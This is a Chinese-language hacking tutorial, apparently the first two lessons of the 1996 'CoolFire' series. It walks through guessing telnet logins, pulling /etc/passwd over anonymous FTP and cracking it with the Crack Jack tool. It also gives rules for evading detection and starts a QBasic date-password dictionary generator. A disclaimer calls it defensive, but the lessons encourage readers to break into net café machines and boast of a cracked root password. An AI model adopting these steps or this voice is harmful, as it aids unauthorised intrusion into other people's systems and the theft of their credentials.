1、CoolFire 系列讲座 第 1 讲作者:CoolFire (2001-10-12 15:00:00)CoolHC Volume 1 By CoolFire Author E-Mail: 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性 , 并不是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路 , 本人概不负责 !#1 甚么是 Hacking ?就是入侵电脑! 有甚么好解释
2、的! 大部份有关介绍 Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人. 破坏 . 唉! 一大堆怪解释就是了, 最好不要成为一个 “骇客“, 我. 不是!#2 为甚么要 Hack ?我们只是为了要 解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作 ! 为了安全性而作革命 !#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦 .恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用! 注意: 千万不要破坏别人的软体或资料 !2. 不修改任何的系统档,
3、如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.4. 不要在 bbs 上谈论你 Hack 的任何事情.5. 在 Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你 Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改
4、则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到 /etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How 1.进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多
5、项服务, 所以如果你只是要 “进入“ 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚么? 我不知道, 你知道吗?!底下的示范并不是像写出来的那么容易, 只不过是要让你 解如何进入, 当然其中还有很多问题, 如打错指令. 等等的毛病. 没有出现在课堂上, 但是我为了面子. 一定要删掉这些不堪入目的东西嘛.示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的 Telnet 主机 , 当然最好是假的, 也就是 Crack过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你
6、的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0(我用的是 . 当然是假的罗, 都已经经过修改了啦 !没有这一台主机啦 ! 别怕 ! 别怕 ! 以下的主机名称都是假的名称, 请同学们要记得 !)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese
7、 Support V1.2C (rev. 3)(嗯. 进来了 ! 开始攻击吧 ! 本次的目标是.) telnet (Telnet 试试看.)Trying 111.222.255.255.Connected to .Escape character is .Password:Login incorrect(没关系, 再来 !)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是 猜 的方法, 今天运气好像不好)telnet closeConnection closed.(重来, 换个 Port 试试看 !) telne
8、t 111.222.255.255 80Trying 111.222.255.255.Connected to 111.222.255.255.Escape character is .ErrorError 400Invalid request “ (unknown method)CERN-HTTPD 3.0AConnection closed by foreign host.(哇哩 ! 连密码都没得输入, 真是. 再来 ! 要有恒心 !)(换 FTP Port 试试) ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP s
9、erver (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (111.222.255.255:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any230-unusual problems, please report them via e-ma
10、il to 230-If you do have problems, please try using a dash (-) as the first character230-of your password - this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer
11、 files.(哇 ! 可以用 anonymous 进来耶! password 部份输入 aaa 就好了 !不要留下足迹喔!)ftp ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯. 太好了 ! 进来了 ! 下一个目标是.)ftp cd etc250 CWD command successful.ftp get passwd (抓回来 !)200 PORT c
12、ommand successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔. 这么容易吗?)ftp !cat passwd (看看 !)root:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/
13、spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15
14、:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1:/home/ftp:/bin/bash(哇哩. 是 Shadow 的. 真是出师不利. )ftp bye221 Goodbye.(不信邪. 还是老话, 要有恒心.)(FTP 不行 , 再 Telnet 看看 !) telnet Trying 111.222.255.255.Connected to .Escape character is .Password:Login incorrect(又猜错 !)cool login: fuck
15、youPassword:Last login: Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstandprogress.cool:$ (哇哈哈 ! 哪个笨 root, 用 system name 作 username 连password 也是 system name. 总算. 没白玩.)cool:$ systembash: system: command not found(嗯. 这个 user 的权限好像不大.)cool
16、:$ lscool:$ pwd/home/fuckyoucool:$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/boot/ home/ lost+found/ sbin/ cool:/$ cd etctelnet quit(好想睡呀 ! 不玩了 ! 下节课再开始.)Connection exit(走了 ! 下节课在见啦 ! 今天就上到这里 ! 老师要先下班了 !)(有学生说: 骗人! 还没有破解呀! 胡说 ! 不是已经进来了吗
17、?看看这节课上的是甚么? -进入主机 ! 嗯.)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How 2.上节课抓回来一个 “乱七八糟 “ 的 /etc/passwd, 你以为我的真那么笨吗? guest 所抓回来的能是甚么好东西? 所以这一节课继续上次的攻击行动. 上节课我们已经 “猜“ 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧 !Digital UNIX () (ttypa)login: FakeNamePassword:Last
18、login: Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯. 进来了 ! 开始攻击吧 ! 本次的目标是.呵.) telnet (Telnet 试试看. 昨天的位址, 有作笔记吧!).tw telnet Trying 111.222.255.255.Connected
19、 to .Escape character is .Password:Login incorrectcool login: fuckyouPassword: (一样输入 fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.confHOSTNAME gateways magic rpcNETWORKING group mail.rc securettyNNTP_INEWS_DOMAIN host.conf m
20、otd sendmail.cfX11 hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shellsbootptab hosts.equiv named.boot shutdownpcsh.cshrc hosts.lpd networks snoopy/csh.login httpd.conf nntpserver slip.hostsexports inetd.conf passwd snooptabfastboot inittab passwd.OLD syslo
21、g.conffdprm issue passwd.old syslog.pidfstab ld.so.cache printcap ttysftpaccess ld.so.conf profile utmp(找寻目标. 太乱了 ! 懒得找, 再来 .)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有 Shadow.)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bi
22、n/john(正点 ! 一点都没有防备 !)cool:/etc$ exitlogout(走了!. 换 FTP 上场 !)Connection closed by foreign ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX
23、.Using binary mode to transfer files.ftp cd /etc250 CWD command successful.ftp get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/b
24、in/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看 ! 呵 ! 假不了 !.)ftp bye221 G exit(闪人罗 ! 下课 !. 喔慢点, 还有事要说明.)passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课所看到的这个格式的 passwd 并不是真正的 passwd.root:0:0:root:/root:/bin/bash因为密码的部份没有东西. 所以拿了也没有用 ! 但这一节课所拿到的东西呢,像是这样, 有几点需要说明的, 就是它究竟代表著甚么?john:23
25、4ab56:9999:13:John Smith:/home/john:/bin/sh它以 “:“ 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了吧 ! 了吧 ! 保留著你千辛万苦所拿到的 passwd, 咱们第三节课再来告诉各位如何使用 Crack Jack 把 passwd 解码. 呵呵. zzZZzZzz. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
26、*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)嗯. 该到第三课了 ! 累了的同学先去喝口水吧 !这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔, 不要告诉我你习惯用 Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4 的怀抱, 但请先确定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page 中拿到这个
27、版本的 Crack Jack ! 这才是真正有用的版本, 速度. 对. 就是这点别人都比不上 ! 但还是要讲讲它的缺点. 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个 DOS Mode 跑, 它可是连理都不会理你的 !OK! 现在切入正题 ! etc/passwd 拿到手了吧 ! 开始罗 ! 使用 Crack Jack 1.4 前所需要的东西有这些 1 Crack Jack 1.4 (废话.$%&) 2 /etc/passwd 档案, 你可以在 Unix 系统中的 /etc/ 目录中找到 passwd 3 字典档 (哪里找, 自己敲. 呵 ClayMore 中有一
28、份 DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了 , LetMeIn! 1.0 里面也有, 听 James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!). 使用 Crack Jack 1.4 前需先确定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name. 输入你的 passwd 档名, DictionaryName 输入你的字典档名 , Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT 中写入它所找到的密码 ! 但. 有点怪的格式
29、! 如果找到的是具 root 权限的密码, Jack 会告诉你 This isJackAss. 嗯.说脏话了 ! 因为使用 Jack 占用的时间实在太多, 如果你中途想要停掉时只要按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能, 中断时会自动存档为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 ! 当然你也可以为你的 Restore 重新命名 ! Jack 也会找得到的 . 如 Ren restore restore.HNT 之後要再寻找的时後就 Jack -Restore:RESTORE.HN
30、T 即可. Jack 会很自动的 Restore 前次所寻找的字串.继续帮你找下去.字典档哪里找: 我的不给你 ! 可以找别的 Brute Force 之类的程式, 有些里面会附, 或是找找其它的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.这一节课没有范例 成功的案例 : 找到过某家网路咖啡店的 root 权限密码 ! Jack 好正点呀 !所花的时间: 20 分钟左右. 但也有找了一两天也找不到的. 呜. 骇客们! 加油吧 !继续 CoolFire 系列讲座 第 2 讲作者:CoolFire (2001-10
31、-12 15:00:00)CoolHC Volume 1By CoolFire Author E-Mail: 这不是一个教学文件, 只是告诉你该如何破解系统 ,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !话说上次 CoolFire 讲到许多的 Net Coffee 店, 安全性之差实在是没话说 ,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被
32、别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的 Net Coffee 可能要有一两天只卖Coffee 而没办法再 Net 下去了!继 CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢 ? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的 Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是 . Net Coffee Shop.*谈一下 Crack Jack 猜猜密码许多人从上一次介绍 Crack Jack 之後就应该已经领教过它的功力了,但是有几
33、点需要说明的,有些人使用 Jack 来帮你寻找 password, 我就当你已经抓到了没有 shadow 的/etc/passwd,但是为甚麽使用 Jack 还是找不到呢 ? 我想你应该要换个正点一点的字典档了, 因为Jack 还是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字 ,那当然连一个小小帐号的密码你都别想猜到了. 数一下你所使用的字典档中有多少字 ?我用的字典档有十九万多个字, 你的呢? 是不是小巫见大巫呀 ? 那麽就赶快充实一下字典档再重新寻找吧 !许多人的密码都有一定的法则, 我自己写了 PaSs2DiC 就是将 UserName 由passwd 档转成字典档的工具, 这是对一些喜欢使用 UserName 当作 Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得“甲“是不是暗恋“乙“才用“ 乙“ 的 ID 作为密码的 ?你可以很简单的使用Qbasic 来制作 “序数“ 密码, 或日期密码, 底下简单的作一个 0101 (一月一日) 到1231 的密码档出来:-Cut Here MakeDate.BAS -Open “Dates“ for output as #1for I=1 to 12for J=1 to 31I1$=rtrim$(ltrim$str$(I)J1$=rtrim$(ltrim$str$(J)
